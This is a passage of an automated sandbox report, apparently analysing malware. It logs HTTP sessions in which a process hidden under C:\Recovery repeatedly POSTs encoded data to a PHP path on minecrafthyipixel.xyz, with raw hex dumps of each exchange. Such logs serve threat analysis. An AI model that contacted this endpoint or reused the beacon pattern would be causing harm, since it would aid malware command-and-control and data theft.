                                                                                                                                    Data Ascii: RZ^]YCT\\^YYWQX[TU_YTTSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&125;7$[$;=U=;7_29(W%8!41*P+;("/<-$[. X =
                                                                                                                                    Apr 19, 2024 13:43:26.432064056 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VTd%2BNT841TkN8L4kiOxiXC45o6ONxJHp0xGtCWyQQAgUVmJQNjqjoA%2BhiiIjI2mbov6NUpcxK2cHOyfsJHKDKqsZPCyRlD2YxsZq3RHtemvowJ6A4%2BMgVOcPb5H%2FehRjO8KGVtNFy3g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca30c3d576754-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:26.432096958 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    82 | 192.168.2.4 | 49831 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:26.679482937 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:26.784126043 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:26.784301043 CEST | 2512 | OUT | Data Raw: 57 59 5e 5d 59 41 51 5f 5c 5e 59 59 57 50 58 58 54 55 5f 5e 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^]YAQ_\^YYWPXXTU_^T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%%!&0$0;Q=2&;S72*8 3-$[. X
                                                                                                                                    Apr 19, 2024 13:43:27.043272972 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8PL5SgKOESaVtd63fd84dvNBsRb66KstRTyDIKdtmJF%2FumG2kMeH6GgMLls29%2F1KV2XjujG42YICHDuMnD5ZVorGZi1IX9k%2FwDVJ%2BOwXymkpxIJjJL%2Fg8hDyoQgKYSfAXKuWvp1i48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3101a478bb6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:27.043320894 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    83 | 192.168.2.4 | 49832 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:27.082515955 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:27.187092066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:27.187262058 CEST | 2192 | OUT | Data Raw: 52 59 5b 5c 5c 47 51 5d 5c 5e 59 59 57 55 58 5a 54 56 5f 5a 54 5d 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\\GQ]\^YYWUXZTV_ZT]SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^126/&##Z0;=W);42W&-!!5=]4409$[. X -
                                                                                                                                    Apr 19, 2024 13:43:27.454585075 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TA0TAlu%2FQncbBrEGkO9aERi5BzEaSqGPFam3xh9QlDl%2FQ8Zxlmyvohkv1zrzGWo5n2PqjBDthwMqTlr9Nu9X0%2F0Dp0WsTffp2PjY8jYDGLOeAcPT9wsWtdh6zWzgghlVr6nF0NbidOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3129ac76741-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 30 26 36 5c 22 2a 24 01 3e 0d 3e 13 28 37 22 05 29 29 31 19 22 3d 30 54 2c 3a 28 10 2b 2b 2e 18 31 33 36 0f 27 2d 37 09 26 20 21 59 00 1a 3a 04 20 2c 3e 01 2e 00 25 59 3c 32 2d 58 20 21 2c 07 3c 07 21 1a 37 38 01 17 3f 10 3d 52 38 2b 20 53 3f 01 3d 5a 2f 19 35 07 20 2b 2c 52 09 12 25 52 2b 06 38 10 27 23 3d 1f 23 0f 38 10 3c 2f 0b 01 27 3b 2f 0e 26 0d 23 05 39 0c 0c 50 26 00 0f 1e 2a 04 0e 1e 20 12 0f 56 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]0&6\"*$>>(7"))1"=0T,:(++.136'-7& !Y: ,>.%Y<2-X !,<!78?=R8+ S?=Z/5 +,R%R+8'#=#8</';/&#9P&* V2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:27.454624891 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    84 | 192.168.2.4 | 49833 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:27.241437912 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:27.345603943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:27.347742081 CEST | 2512 | OUT | Data Raw: 57 55 5b 59 59 4a 54 5b 5c 5e 59 59 57 55 58 58 54 50 5f 5d 54 5c 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[YYJT[\^YYWUXXTP_]T\SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>*R!<X&#(';=?++^&)$;>Q#==Z48_-%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:27.638834953 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQgPs5n2CDNsOurWYS9gyvHHxeDZjEc0Yb8hyQw4TyezcEOcJ3m6%2FopkETMneS%2B%2B7f8DX8JkKWPGD82wG3B1dvvreDI6WmieqSO652jghfh0wpmzz%2FvphUEiW1ZLeA5h%2Fe4vvt1Xxbk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca313993ab04e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:27.638875961 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    85 | 192.168.2.4 | 49834 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:27.857820034 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:27.965120077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:27.965290070 CEST | 2512 | OUT | Data Raw: 52 58 5e 5d 59 41 54 59 5c 5e 59 59 57 51 58 52 54 53 5f 5f 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^]YATY\^YYWQXRTS__TUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-)6<Y$ 3'+*>?]%9;%; )8#Z /8[-$[. X =
                                                                                                                                    Apr 19, 2024 13:43:28.227858067 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nn4btTvl05%2B5qhFP%2FB99kSUcDYdueBsQVWfw9BCoJY0BkD8NrWemJN1qdtl2GGe4S03sCTLAXpsKw6gLm5GaeD2yax%2B3KBNnLAfoxno1mWhVdM95McNiqNcK8NCRceFISBOMJG5ehHs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3177a3d7bae-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:28.227886915 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    86 | 192.168.2.4 | 49835 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:28.455799103 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:28.560292959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:28.560431004 CEST | 2512 | OUT | Data Raw: 52 5d 5e 5f 5c 40 51 5d 5c 5e 59 59 57 51 58 5c 54 57 5f 5c 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^_\@Q]\^YYWQX\TW_\T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&=!(Y'0$$]))8;2:0S$; "!)]"/$/5$[. X =
                                                                                                                                    Apr 19, 2024 13:43:28.909697056 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhWpu1IN7csxWNJmJhvwC%2BSE3VwzNWm8fXo%2FNPjdgGD1e2VztS9QHvO%2BZmO0w1itOymo%2BjT%2Fpp87ZGsD77Tc76c3GRYk90g3mlhh7oHA13cKY2aOfHC8wDoU8TYDY5r0yr%2FxtmWrf3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca31b2f3653c8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:28.909761906 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    87 | 192.168.2.4 | 49836 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:29.139802933 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:29.244271994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:29.244447947 CEST | 2512 | OUT | Data Raw: 52 58 5b 5b 5c 40 51 5e 5c 5e 59 59 57 51 58 5d 54 50 5f 5d 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[[\@Q^\^YYWQX]TP_]TUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%-"400'$8>=81:82.Q#6>;7Z#Z,95$[. X =
                                                                                                                                    Apr 19, 2024 13:43:29.515619040 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:29 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adUZofNeKqtBTeGiSEJf6wmjpTAEIvnuOKrrFhi9SbD%2FwhFbz5TwN7IqXecHaOKI89uBS3vv2s8WRmYFTUatj9uRopr24MHikWV3ZbOeKmP%2FkJBj%2BV1jGmzDSySlZSJfqemejWQrsHU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca31f7fedadc5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:29.515662909 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    88 | 192.168.2.4 | 49837 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:29.734255075 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:29.838352919 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:29.838499069 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5b 59 44 54 55 5c 5e 59 59 57 55 58 5e 54 5a 5f 5f 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^[YDTU\^YYWUX^TZ__T[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.T5;Y3#?\%;*;X&: &2W#)+;^ Z/.%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:30.220585108 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1GmXzqarGmX1WYWlMFjcDLQm78I0U9a6uzdsV03286uc2dmfSflAcqLaSP0TXiJ451nB5tgvR8SaOH9ouuHkr5f%2BvOHBhPBPJ8G9FLf5uiuAgprIaUTsJeWo6hV9Pa1x2WDEWKd9nA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32328018bbb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:30.220832109 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 49838 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:30.483052969 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:30.587064981 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:30.847598076 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7MCaVtLkH4K8szJ8KRBTOVeDtrdFgM9daO75ihUYdcH5nJo3SpSmocZEkvTBRKfRR6nD1%2Fv58QYD7F87C76Vaap7iGs5c8KiGrS6BcAkETBZ2Y7JSNWFg25KzLSGRa7egNphdsDkZs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca327da25b09f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:30.847640038 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 49839 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:31.076318026 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:31.181094885 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:31.555847883 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:31 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
